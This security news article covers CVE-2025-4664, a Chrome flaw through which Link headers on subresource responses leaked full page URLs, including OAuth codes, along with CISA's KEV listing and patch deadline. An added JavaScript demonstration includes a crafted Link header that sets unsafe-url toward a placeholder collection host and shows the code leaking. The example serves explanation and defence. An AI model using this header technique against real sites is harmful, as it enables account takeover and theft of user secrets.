CISA Identifies Recently Mitigated Chrome Vulnerability as Under Active Exploitation


On May 15, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) warned U.S. federal agencies about a high-severity vulnerability in the Chrome web browser, tracked as CVE-2025-4664, for which a working exploit is known to exist in the wild. Vsevolod Kokorin of Solidlab discovered the weakness and published technical details on May 5; Google shipped the fix on May 14 in Chrome 136.0.7103.113/.114.

The vulnerability is insufficient policy enforcement in Chrome's Loader component. A remote attacker who can get a victim to load a crafted HTML page, or who controls a resource that page embeds, can read cross-origin data. Kokorin explained the root cause: unlike other browsers, Chrome resolves Link headers on subresource responses, not only on the main document, and a Link header can specify a referrer policy. An attacker who serves a third-party resource with a Link header that sets an unsafe policy such as unsafe-url therefore causes the follow-on request to carry the embedding page's full URL in the Referer header, query string included.

Query strings frequently carry secrets. In OAuth flows the redirect URL holds the authorization code, and leaking it can lead to account takeover. Kokorin noted that developers rarely consider that a third-party resource, even a simple image, embedded in such a page can capture those parameters.
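The leak above comes down to which Referer a browser attaches to a request under a given referrer policy. The following added example (not Chrome code and not Kokorin's proof of concept) models that computation for the standard policies, then applies it to a Link header carried on a third-party image response, which is the pre-fix Chrome behaviour the text describes. It assumes the preload form of the Link header with a `referrerpolicy` parameter; the hostnames, the OAuth callback URL and the authorization code are constructed for the demonstration. Running it shows that the default policy leaks only the origin, while `unsafe-url` leaks the whole callback URL, `code` included.

```javascript
// Added example: models Referer computation under each Referrer Policy and applies it
// to a Link header on a subresource response. Hosts, paths and the code value are made up.

function parseLinkHeader(value) {
  // Minimal RFC 8288 parser for: <url>; rel=preload; as=image; referrerpolicy=unsafe-url
  const links = [];
  for (const part of value.split(/,(?=\s*<)/)) {
    const m = part.match(/^\s*<([^>]*)>\s*(.*)$/);
    if (!m) continue;
    const params = {};
    for (const p of m[2].split(';')) {
      const kv = p.match(/^\s*([^=\s]+)\s*=\s*"?([^"]*?)"?\s*$/);
      if (kv) params[kv[1].toLowerCase()] = kv[2];
    }
    links.push({ url: m[1], params });
  }
  return links;
}

function stripForReferrer(u) {
  // Referrer stripping (Fetch spec): drop credentials and fragment, keep path and query.
  const url = new URL(u);
  url.username = ''; url.password = ''; url.hash = '';
  return url.href;
}

function originOf(u) { return new URL(u).origin + '/'; }

function referrerFor(documentUrl, requestUrl, policy) {
  // Returns the Referer value a browser sends (null = no Referer header).
  const doc = new URL(documentUrl), req = new URL(requestUrl);
  const sameOrigin = doc.origin === req.origin;
  const downgrade = doc.protocol === 'https:' && req.protocol !== 'https:'; // TLS -> non-TLS
  switch (policy || 'strict-origin-when-cross-origin') { // browser default when unset
    case 'no-referrer': return null;
    case 'unsafe-url': return stripForReferrer(documentUrl);
    case 'origin': return originOf(documentUrl);
    case 'same-origin': return sameOrigin ? stripForReferrer(documentUrl) : null;
    case 'strict-origin': return downgrade ? null : originOf(documentUrl);
    case 'no-referrer-when-downgrade': return downgrade ? null : stripForReferrer(documentUrl);
    case 'origin-when-cross-origin': return sameOrigin ? stripForReferrer(documentUrl) : originOf(documentUrl);
    case 'strict-origin-when-cross-origin':
      if (sameOrigin) return stripForReferrer(documentUrl);
      return downgrade ? null : originOf(documentUrl);
    default: throw new Error('unknown referrer policy: ' + policy);
  }
}

function preloadReferers(documentUrl, subresourceHeaders) {
  // Pre-fix Chrome honoured Link preloads on subresource responses; compute the Referer
  // each such preload request would carry when fetched on behalf of documentUrl.
  const out = [];
  for (const link of parseLinkHeader(subresourceHeaders.link || '')) {
    if (link.params.rel !== 'preload') continue;
    const target = new URL(link.url, documentUrl).href;
    out.push({ target, referer: referrerFor(documentUrl, target, link.params.referrerpolicy) });
  }
  return out;
}

function leakedParams(referer, sensitive = ['code', 'state', 'access_token', 'id_token']) {
  // Which sensitive query parameters a given Referer value exposes.
  if (!referer) return [];
  const q = new URL(referer).searchParams;
  return sensitive.filter((n) => q.has(n));
}

// Constructed scenario: an OAuth redirect landing page that embeds one third-party image.
const callbackPage = 'https://app.example/oauth/callback?code=AUTHCODE-1234&state=xyz';
const attackerImageResponse = {
  'content-type': 'image/png',
  link: '<https://third-party.example/collect>; rel=preload; as=image; referrerpolicy=unsafe-url',
};
const benignImageResponse = {
  'content-type': 'image/png',
  link: '<https://third-party.example/collect>; rel=preload; as=image',
};

function demo() {
  return {
    withUnsafeUrl: preloadReferers(callbackPage, attackerImageResponse),
    withDefault: preloadReferers(callbackPage, benignImageResponse),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The application-side lesson is independent of the browser fix: exchange the authorization code server-side and answer the callback with a redirect to a URL that no longer carries it, so no page that embeds third-party resources is ever loaded with a secret in its query string.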

Google has not said whether it observed attacks, but its advisory states that it is aware of reports that an exploit for CVE-2025-4664 exists in the wild. CISA treated the flaw as actively exploited and added it to its Known Exploited Vulnerabilities (KEV) catalog, the list of vulnerabilities known to be used in real attacks.

Under the November 2021 Binding Operational Directive (BOD) 22-01, U.S. Federal Civilian Executive Branch agencies must remediate KEV entries within three weeks of their addition, which for this May 15 entry means updating Chrome installations by June 5, 2025. The directive binds only federal agencies, but CISA urges network defenders in every sector to prioritize the update.

CISA has emphasized the critical nature of patching such vulnerabilities, which typically serve as common attack vectors for malicious cyber actors, posing significant threats to federal infrastructure.

This is the second actively exploited Chrome zero-day Google has patched this year, after CVE-2025-2783, a high-severity flaw used in targeted cyber-espionage against Russian government organizations, media outlets and educational institutions. Kaspersky researchers found that the attackers used the CVE-2025-2783 exploit to escape Chrome's sandbox and deploy malware on affected systems.